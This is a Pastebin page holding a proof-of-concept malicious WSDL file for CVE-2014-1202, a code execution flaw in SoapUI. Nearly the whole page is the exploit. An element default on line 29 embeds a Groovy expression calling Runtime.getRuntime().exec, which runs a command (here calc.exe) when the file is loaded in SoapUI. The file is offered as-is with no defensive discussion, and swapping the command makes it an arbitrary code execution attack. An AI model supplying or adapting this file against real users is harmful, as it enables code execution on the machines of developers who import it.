daily pastebin goal
6%
SHARE
TWEET

Malicious WSDL CVE-2014-1202

a guest Jan 14th, 2014 228 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!--Malicious WSDL File, SoapUI Code Execution Vulnerability CVE-2014-1202, Barak Tawily-->
  2. <wsdl:definitions targetNamespace="http://example.companyInfo"
  3.  xmlns:tns="http://example.companyInfo"
  4.  xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
  5.  xmlns:wsdlsoap="http://schemas.xmlsoap.org/wsdl/soap/"
  6.  xmlns:wsdlmime="http://schemas.xmlsoap.org/wsdl/mime/"
  7.  xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  8.  
  9.  <wsdl:types>
  10.   <xsd:schema elementFormDefault="qualified"
  11.    targetNamespace="http://example.header">
  12.  
  13.    <xsd:element name="sampleHeader">
  14.     <xsd:complexType>
  15.      <xsd:all>
  16.       <xsd:element name="priority" type="xsd:int"/>
  17.      </xsd:all>
  18.     </xsd:complexType>
  19.    </xsd:element>
  20.   </xsd:schema>
  21.  
  22.  
  23.   <xsd:schema elementFormDefault="qualified"
  24.    targetNamespace="http://example.companyInfo">
  25.  
  26.    <xsd:element name="Payload_Request">
  27.     <xsd:complexType>
  28.      <xsd:all>
  29.       <xsd:element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="xsd:string"/>
  30.      </xsd:all>
  31.     </xsd:complexType>
  32.    </xsd:element>
  33.  
  34.    <xsd:element name="Payload_RequestResult">
  35.     <xsd:complexType>
  36.      <xsd:all>
  37.       <xsd:element name="result" type="xsd:float"/>
  38.      </xsd:all>
  39.     </xsd:complexType>
  40.    </xsd:element>
  41.   </xsd:schema>
  42.  
  43.  
  44.  </wsdl:types>
  45.  
  46.  <wsdl:message name="Payload_RequestRequest">
  47.    <wsdl:part name="part1" element="tns:Payload_Request"/>
  48.  </wsdl:message>
  49.  
  50.  <wsdl:message name="Payload_RequestResponse">
  51.   <wsdl:part name="part1" element="tns:Payload_RequestResult"/>
  52.   <wsdl:part name="part2" type="xsd:string"/>
  53.   <wsdl:part name="part3" type="xsd:base64Binary"/>
  54.  </wsdl:message>
  55.  
  56.  <wsdl:portType name="CompanyInfo">
  57.   <wsdl:operation name="Payload_Request">
  58.    <wsdl:input message="tns:Payload_RequestRequest"
  59.                name="Payload_RequestRequest"/>
  60.    <wsdl:output message="tns:Payload_RequestResponse"
  61.                 name="Payload_RequestResponse"/>
  62.   </wsdl:operation>
  63.  </wsdl:portType>
  64.  
  65.  <wsdl:binding name="Exploit" type="tns:CompanyInfo">
  66.   <wsdlsoap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
  67.  
  68.   <wsdl:operation name="Payload_Request">
  69.    <wsdlsoap:operation soapAction=""/>
  70.    <wsdl:input name="Payload_RequestRequest">
  71.     <wsdlsoap:body use="literal"/>
  72.    </wsdl:input>
  73.    <wsdl:output name="Payload_RequestResponse">
  74.     <wsdlsoap:body use="literal"/>
  75.    </wsdl:output>
  76.   </wsdl:operation>
  77.  </wsdl:binding>
  78.  
  79.  <wsdl:service name="CompanyInfoService">
  80.   <wsdl:port binding="tns:Exploit" name="SOAPPort">
  81.    <wsdlsoap:address location="http://somewhere/services/CompanyInfoService"/>
  82.   </wsdl:port>
  83.  </wsdl:service>
  84.  
  85. </wsdl:definitions>
RAW Paste Data
Top